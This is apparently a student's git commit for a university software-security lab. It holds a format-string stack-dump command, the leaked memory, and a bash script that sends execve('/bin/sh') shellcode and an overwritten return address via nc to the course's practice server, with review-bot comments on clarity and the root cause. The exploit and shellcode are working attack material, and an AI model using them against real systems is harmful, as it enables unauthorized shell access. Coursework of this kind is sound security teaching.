Finished assignemnt 5b lol master
authorMart Lubbers <mart@martlubbers.net>
Mon, 16 Mar 2015 10:12:29 +0000 (11:12 +0100)
committerMart Lubbers <mart@martlubbers.net>
Mon, 16 Mar 2015 10:12:29 +0000 (11:12 +0100)
ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f [new file with mode: 0644]

index 21c3798..834ddc7 100644 (file)
@@ -3,26 +3,66 @@ The buffer is probably 104 characters wide. All characters over 104 will not be
 echoed.
 
 b,c)
-printf "%20s\n" | sed 's/ /%lx&/g' | nc hackme.cs.ru.nl 2266
+printf "%52s\n" | sed 's/ /%p/g' | nc hackme.cs.ru.nl 2266 |\ sed 's/(nil)\|0x/\n&/g'
 
 Memory:
-7ffff7ff8050
-7ffff7dd8de0
-fbad2088
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-7fffffffeb00           saved frame pointer
-4004c1                 return address
-1                      return value
-7fffffffeb30
-7fffffffebc0
+0x7ffff7ff8066
+0x7ffff7dd8de0
+0xfbad2088
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x702570257025
+0x7fffffffeb40
+0x7fffffffebd0         Saved frame pointer
+0x4006a9               Return pointer
+(nil)
+0x100400530
+0x7fffffffebe0
+0x4006c2
+(nil)
+0x7ffff7a70ead
+(nil)
+0x7fffffffecc8
+0x100000000
+0x4006b9
+(nil)
+0x1aad25fd1bef7a81
+0x400530
+0x7fffffffecc0
+(nil)
+(nil)
+0xe552da02cc0f7a81
+0xe552cab3073f7a81
+0x7fff00000000
+(nil)
+(nil)
+0x4006e0
+0x7fffffffecc8
+0x1
+(nil)
+(nil)
+0x400530
+0x7fffffffecc0
+(nil)
+0x400559
+
+30 bytes shell codes
+14 bytes in de zooi
+94 bytes zooi
+
+104 zooi
+8 bytes waarde?
+8 frame pointer?
+8 return pointer
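Review bot: The working notes at the end of this hunk (`30 bytes shell codes`, `14 bytes in de zooi`, `94 bytes zooi`, and the three lines ending in `?`) are left unresolved and partly in Dutch, so the file never states the stack layout it settled on. The listed byte counts do not obviously add up to the 104-byte buffer named at the top of the file, and a reader cannot tell which figures were superseded. I would replace them with one statement in English, for example `104-byte buffer, 8 bytes unknown local, 8 bytes saved frame pointer, 8 bytes return address`, keeping a question mark only where a value is still unverified. The dump also suggests the service passes client input to a printf-style function as the format string; if that is the case, naming that root cause and the `printf("%s", buf)` form that avoids it would make the answer complete.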
index 2f62e90..0839a7b 100644 (file)
@@ -1,11 +1,10 @@
-shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
-
-#Illegal instruction
-returnvalue="\x7f\xff\xf7\xff\xeb\x30"
-fillers=$(printf "%42s" | sed 's/ /\\x0f\\x1f/g')
-
-returnvalue="\x7f\xff\xf7\xff\xeb\x30"
-fillers=$(printf "%39s" | sed 's/ /\\x0f\\x1f/g')
-
-
-cat <(echo -e "${fillers}${shellcode}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266
+{      # Print padding and stack inspection
+       printf "......%34s" | sed 's/ /%p/g'
+       # Print shell code
+       printf "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1"
+       printf "\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+       # Overwrite frame pointer and top of stack pointer print return address
+       printf "%16s\x50\xeb\xff\xff\xff\x7f\n"
+       # Start reading from stdin and echoing it to stdout
+       cat
+} | nc hackme.cs.ru.nl 2266
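Review bot: The comment `# Overwrite frame pointer and top of stack pointer print return address` is garbled and does not say which bytes of the following `printf` are filler and which are the address; something like `# 16 filler bytes, then the return address in little-endian byte order` would read cleanly. The script has no shebang although it depends on bash's `printf` handling of `\x` escapes (exercise2f says to run it with bash), so `#!/bin/bash` as the first line would make that explicit. The address bytes `\x50\xeb\xff\xff\xff\x7f` are a magic constant with no record of where the value came from. It presumably holds only while the target runs with a fixed, executable stack and no canary, and a header comment stating that assumption would show which mitigations the exercise depends on being absent.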
diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f
new file mode 100644 (file)
index 0000000..7213a3c
--- /dev/null
@@ -0,0 +1 @@
+Just run exercise2e.sh with bash and it will open a shell.